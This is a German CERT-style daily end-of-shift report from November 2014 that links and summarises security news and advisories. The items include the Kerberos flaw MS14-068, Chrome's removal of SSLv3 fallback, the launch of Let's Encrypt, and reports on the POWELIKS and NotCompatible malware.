Tageszusammenfassung - Mittwoch 19-11-2014

End-of-Shift report

Timeframe: Dienstag 18-11-2014 18:00 − Mittwoch 19-11-2014 18:00 Handler: Stephan Richter Co-Handler: n/a

MS14-068 - Critical: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Version: 1.0

This security update resolves a privately reported vulnerability in Microsoft Windows Kerberos KDC that could allow an attacker to elevate unprivileged domain user account privileges to those of the domain administrator account. An attacker could use these elevated privileges to compromise any computer in the domain, including domain controllers. An attacker must have valid domain credentials to...

https://technet.microsoft.com/en-us/library/security/MS14-068

Additional information about CVE-2014-6324

Today Microsoft released update MS14-068 to address CVE-2014-6324, a Windows Kerberos implementation elevation of privilege vulnerability that is being exploited in-the-wild in limited, targeted attacks. The goal of this blog post is to provide additional information about the vulnerability, update priority, and detection guidance for defenders. Microsoft recommends customers apply this update to their domain controllers as quickly as possible. Vulnerability Details CVE-2014-6324 allows...

http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx

Google Removes SSLv3 Fallback Support From Chrome

Google has released Chrome 39, fixing 42 security vulnerabilities and removing support for the fallback to SSLv3, the component that was the target of the POODLE attack revealed last month. When the POODLE attack was disclosed by several Google researchers in October, the company said that it had added a change to Chrome that would...

http://threatpost.com/google-removes-sslv3-fallback-support-from-chrome/109455

A New Free CA

Announcing Lets Encrypt, a new free certificate authority. This is a joint project of EFF, Mozilla, Cisco, Akamai, and the University of Michigan. This is an absolutely fantastic idea. The anchor for any TLS-protected communication is a public-key certificate which demonstrates that the server youre actually talking to is the server you intended to talk to. For many server operators,...

https://www.schneier.com/blog/archives/2014/11/a_new_free_ca.html

Survey: real-time SIEM solutions help orgs detect attacks within minutes

Real-time security information and event management solutions help organizations detect targeted attacks and advanced persistent threats within minutes, according to a McAfee survey.

http://www.scmagazine.com/survey-real-time-siem-solutions-help-orgs-detect-attacks-within-minutes/article/384030/

POWELIKS Levels Up With New Autostart Mechanism

Last August, we wrote about POWELIKS's malware routines that are known for hiding its malicious codes in the registry entry as part of its evasion tactics. In the newer samples we spotted, malware detected as TROJ_POWELIKS.B employed a new autostart mechanism and removes users' privileges in viewing the registry's content. As a result, users won't be able to suspect that...

http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/zurdvNxST00/

Pan-European Cyber Security Competition organised by ENISA

Today (19 November 2014) the European Union Agency for Network and Information Security (ENISA) is happy to announce the planning of the 1st pan-European Cyber Security Competition in 2015. The competition is organised jointly in collaboration with experienced organisations from EU Member States for students.

http://www.enisa.europa.eu/media/news-items/pan-european-cyber-security-competition-organised-by-enisa

RSS Reveals Malware Injections

There are multiple different ways to detect invisible malware on a website: You can scrutinize the HTML code of web pages. Use external scanners like SiteCheck or UnmaskParasites. Get alerts from anti-viruses or search engines (both in search results and via their Webmaster Tools). Try to open web pages with different User-Agents and check for...

http://blog.sucuri.net/2014/11/rss-reveals-malware-injections.html

Test Tool for Web App Security Scanners Released by Google

A new tool was open-sourced by Google on Tuesday, aiming at improving the efficiency of automated web security scanners by evaluating them with patterns of vulnerabilities already seen in the wild.

http://news.softpedia.com/news/Test-Tool-for-Web-App-Security-Scanners-Released-by-Google-465322.shtml

Microsoft bessert beim SChannel-Patch nach

Still und heimlich haben die Windows-Macher am Dienstag mit dem Update außer der Reihe auch eine neue Revision des SChannel-Patches ausgeliefert. Diese soll die Probleme mit der TLS-Verschlüsselung und massive Performance-Einbußen bei SQL Server beheben.

http://www.heise.de/security/meldung/Microsoft-bessert-beim-SChannel-Patch-nach-2460212.html

Most advanced mobile botnet EVER is coming for your OFFICE Androids

NotCompatible A newly discovered variant of NotCompatible is establishing what has been called the most advanced mobile botnet yet created.

http://go.theregister.com/feed/www.theregister.co.uk/2014/11/19/android_botnet_notcompatible/

jQuery: Cross-Site-Scripting in Captcha-Beispielcode weit verbreitet

Ein populäres jQuery-Plugin liefert Code mit einer Cross-Site-Scripting-Lücke aus. Der verwundbare Code stammt ursprünglich von einem Beispielskript für Captchas, das auf sehr vielen Webseiten zu finden ist.

http://www.golem.de/news/jquery-cross-site-scripting-in-captcha-beispielcode-weit-verbreitet-1411-110660-rss.html

A Peek Inside a PoS Scammer's Toolbox

PoS malware has been receiving a tremendous amount of attention in the past two years with high profile incidents like Target, Home Depot, and Kmart. With the massive "Black Friday" shopping season coming up, PoS malware will surely get additional publicity. This high profile nature means, we constantly look for evolving PoS malware and look into their behavior...

http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/xF7gxViXP4A/

Nasty Security Bug Fixed in Android Lollipop 5.0

There is a vulnerability in Android versions below 5.0 that could allow an attacker to bypass ASLR and run arbitrary code on a target device under certain circumstances. The bug was fixed in Lollipop, the newest version of the mobile OS, released earlier this week. The vulnerability lies in java.io.ObjectInputStream, which fails to check whether...

http://threatpost.com/nasty-security-bug-fixed-in-android-lollipop-5-0/109476

Cisco Unified Communications Manager IM and Presence Service Enumeration Vulnerability

CVE-2014-8000

http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-8000

Bugtraq: Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension

http://www.securityfocus.com/archive/1/534017